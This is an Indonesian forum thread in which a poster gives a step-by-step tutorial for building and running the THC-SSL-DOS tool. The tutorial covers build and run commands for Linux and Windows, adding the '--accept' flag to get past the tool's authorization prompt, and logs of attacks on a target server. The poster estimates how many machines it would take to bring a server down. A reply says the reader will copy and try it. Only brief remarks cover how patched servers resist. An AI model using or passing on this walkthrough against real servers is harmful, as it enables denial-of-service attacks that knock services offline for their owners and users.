02-11-2012, 03:10 PM
(10-25-2011, 04:05 PM)konspirasi Wrote: Setelah jalan-jalan disini, ternyata ada DoS tipe yg ane baru tau yaitu dengan memanfaatkan protokol SSL yang dibuat oleh The Hacker's Choice.
Download aja langsung sourcenya:
Bagi pengguna Unix/Linux disini
Bagi pengguna Windows disini
1. Cara menggunakan di Unix/Linux:
EDITED: (ane baru coba setelah pulang kantor )
ekstrak dulu filenya denganCode:tar xvf thc-ssl-dos-1.4.tar.gz
lalu masuk ke folder /thc-ssl-dos-1.4.tar.gz
lakukan
Code:./configure
klo ada errorQuote:configure: error: libcrypto not found part of openssl.berarti harus install libssl-devCode:apt-get install libssl-dev
trus
Code:make all install
jalaninnya:
Code:./thc-ssl-dos masuk.in.ip.target 443
klo ada error:
Quote:ERROR:
Please agree by using '--accept' option that the IP is a legitimate target
and that you are fully authorized to perform the test against this target.
ini semacam agreement antara kita dengan pembuat aplikasi, tambahin --accept aja di line diatas
Code:./thc-ssl-dos masuk.in.ip.target 443 --accept
jika sudah jalan akan muncul seperti dibawah:
Quote:root@iKONs:~/Programs/thc-ssl-dos-1.4/src# thc-ssl-dos masuk.in.ip.target 443 --accept
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/
http://www.thc.org
Twitter @hackerschoice
Greetingz: the french underground
Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 45 [45.39 h/s], 14 Conn, 0 Err
Handshakes 111 [66.31 h/s], 14 Conn, 0 Err
Handshakes 177 [66.50 h/s], 14 Conn, 0 Err
Handshakes 246 [68.77 h/s], 16 Conn, 0 Err
Handshakes 310 [64.02 h/s], 17 Conn, 0 Err
Handshakes 380 [70.01 h/s], 17 Conn, 0 Err
Handshakes 447 [67.14 h/s], 17 Conn, 0 Err
Handshakes 499 [51.92 h/s], 18 Conn, 0 Err
Handshakes 565 [66.16 h/s], 18 Conn, 0 Err
Handshakes 631 [65.66 h/s], 18 Conn, 0 Err
Handshakes 694 [62.98 h/s], 19 Conn, 0 Err
Handshakes 761 [67.30 h/s], 19 Conn, 0 Err
Handshakes 823 [61.69 h/s], 19 Conn, 0 Err
Handshakes 886 [62.96 h/s], 20 Conn, 0 Err
perhatikan yg warna merah diatas, berarti yg ane lakukan sekitar 60-70 koneksi per detik terhadap server, normalnya sebuah server dapat melakukan sampai 300 koneksi SSL
sehingga dapat disimpulkan serangan DoS yang ane lakukan tidak berhasil membuat server down
berarti paling ngga ada 5 komputer dengan tools ini utk menjatuhkan suatu server...cmiiw
2. Cara menggunakan di Windows:
ekstrak aja file thc-ssl-dos-1.4-win-bin.zip pake winrar/winzip/7zip dsb
buka cmd, masuk ke folder hasil ekstrak diatas, lalu:
Quote:C:\Downloads\Compressed\thc-ssl-dos>thc-ssl-dos.exe -h
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/
http://www.thc.org
Twitter @hackerschoice
Greetingz: the french underground
./thc-ssl-dos [options] <ip> <port>
-h help
-l <n> Limit parallel connections [default: 400]
jalaninnya:
Code:thc-ssl-dos.exe -l 400 masuk.in.ip.target 443
Untuk lebih jelasnya bisa lihat ke website THC disini.
UPDATE!
klo ada error seperti ini:
1.
Quote:thc-ssl-dos-1.4> src/thc-ssl-dos [target_ip] 443 --accept
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/
http://www.thc.org
Twitter @hackerschoice
Greetingz: the french underground
Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 0 [0.00 h/s], 181 Conn, 0 Err
Handshakes 0 [0.00 h/s], 181 Conn, 0 Err
Handshakes 0 [0.00 h/s], 181 Conn, 0 Err
Handshakes 0 [0.00 h/s], 231 Conn, 0 Err
Handshakes 0 [0.00 h/s], 231 Conn, 0 Err
Handshakes 0 [0.00 h/s], 231 Conn, 0 Err
Handshakes 0 [0.00 h/s], 231 Conn, 0 Err
Handshakes 0 [0.00 h/s], 231 Conn, 0 Err
Handshakes 0 [0.00 h/s], 231 Conn, 0 Err
Handshakes 0 [0.00 h/s], 231 Conn, 0 Err
Handshakes 0 [0.00 h/s], 231 Conn, 0 Err
Handshakes 0 [0.00 h/s], 231 Conn, 0 Err
Handshakes 0 [0.00 h/s], 233 Conn, 0 Err
Handshakes 0 [0.00 h/s], 233 Conn, 0 Err
Handshakes 0 [0.00 h/s], 233 Conn, 0 Err
Handshakes 0 [0.00 h/s], 233 Conn, 0 Err
Handshakes 0 [0.00 h/s], 233 Conn, 0 Err
Handshakes 0 [0.00 h/s], 233 Conn, 0 Err
Handshakes 0 [0.00 h/s], 233 Conn, 0 Err
Handshakes 0 [0.00 h/s], 233 Conn, 0 Err
Handshakes 0 [0.00 h/s], 233 Conn, 0 Err
ERROR: Target has disabled renegotiations.
Use your own skills to modify the source to test/attack
the target [hint: TCP reconnect for every handshake].
berarti SSL Renegotiation pada server telah di blokir sehingga tidak vulnerable terhadap serangan ini.
2.
Quote:thc-ssl-dos-1.4> src/thc-ssl-dos [target_ip] 443 --accept
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/
http://www.thc.org
Twitter @hackerschoice
Greetingz: the french underground
Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
SSL: error:00000000:lib(0):func(0):reason(0)
SSL: error:00000000:lib(0):func(0):reason(0)
SSL: error:00000000:lib(0):func(0):reason(0)
SSL: error:00000000:lib(0):func(0):reason(0)
SSL: error:00000000:lib(0):func(0):reason(0)
berarti SSL di server tersebut telah di patch dengan set "Connection soft Limit" dan "Connection hard limit" di "Server"->"Security"->"Per client throttling", di set soft limit to 20 dan hard limit to 30.
Note:
- masukin IP target, klo menggunakan URL ane coba ga bisa
- disini kita hanya bertukar ilmu, penggunaan tools ini merupakan tanggung jawab masing-masing
semoga bermanfaat
M
thanks om turtornya ijin copas and dicoba om...